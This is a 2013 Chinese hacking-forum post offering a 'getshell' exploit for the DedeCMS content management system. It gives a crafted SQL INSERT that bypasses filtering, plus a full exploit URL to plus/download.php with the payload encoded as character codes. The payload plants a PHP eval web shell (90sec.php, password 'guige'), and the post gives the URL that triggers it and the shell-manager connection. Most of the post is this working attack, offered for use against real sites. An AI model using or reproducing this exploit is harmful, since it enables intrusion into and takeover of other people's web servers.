找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2511|回复: 0
打印 上一主题 下一主题

dedecms漏洞getshell EXP最新

[复制链接]
跳转到指定楼层
楼主
发表于 2013-6-10 16:49:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本帖最后由 土豆 于 2013-6-10 14:41 编辑 , W+ h* Q/ M6 z4 E8 O

9 k0 b& a1 F& A% D' p+ m1 |# K7 B7 @
作者:鬼哥
1 P# ^! `" ]5 o1 ?  d" z
. K" w1 u$ q( ?/ \6 n8 l/ A6 ^看贴不回,没JJ9 ~# X; @8 @. \# O$ K. I$ J+ Y
, k$ _3 y& P7 B) u# `
漏洞大家都知道是哪个。- E5 |  U# a  {' P
8 e9 w0 W5 ]9 g* W) j  B
其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。. Y% G* D1 z/ @  d- v

8 |# d( Z8 x* _8 ^但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。/ q0 ~% ?' o4 h8 @8 r" l3 a9 L

7 T$ [: u+ V, S! r! f6 v4 f刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?/ Z4 G/ E, z! o( P

( `/ E9 |+ x1 p5 \0 B! }getshell 很容易 。 既然刚发出来的是 sql方法getshell  我也看到几个人发了sql增加表mytag的内容。" \* W! j) M# n4 X$ {

% J: |) a2 Z- d! J. K3 j- x但是测试了下。。失败& E0 ]$ f5 r0 T4 g' l; g
3 i2 S, y1 a" W  v
原因: 用的语句是update  很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴  错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。
5 Y6 ]+ o7 a( ]' r3 t9 ^3 `! ]
6 e9 e' f2 w1 K: F2 f构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'`
0 N, q2 J( B% T/ \& q
- X: l5 V8 n. H+ R8 o* BEXP:% L/ w3 R/ H+ Y, I
! D9 y$ E; C* k" U
http://www.xxx.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96
$ }5 V  L, k: @1 p! B
( _* \  D+ O4 x* J9 C, O) h' E3 M4 I+ F
成功增加。
; X) l' X8 h6 P$ S3 _# R2 [' Z+ t3 R# ^
访问http://www.xxx.com/plus/mytag_js.php?aid=9013
. [, ^+ X& L& V7 X, z5 b* W生成一句话木马.8 L% D9 ^4 F$ Q& T5 S0 c
菜刀连接 http://www.xxx.com/plus/90sec.php  密码 guige; f: v4 Y( E* g: u8 l
$ ~" b9 F2 J+ t% _# b
测试OK。
/ s/ G6 q7 R) m4 y9 x
& M# [3 s! h, b& V( ? ; @  @0 F. H& G  i1 l, N9 a4 F
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表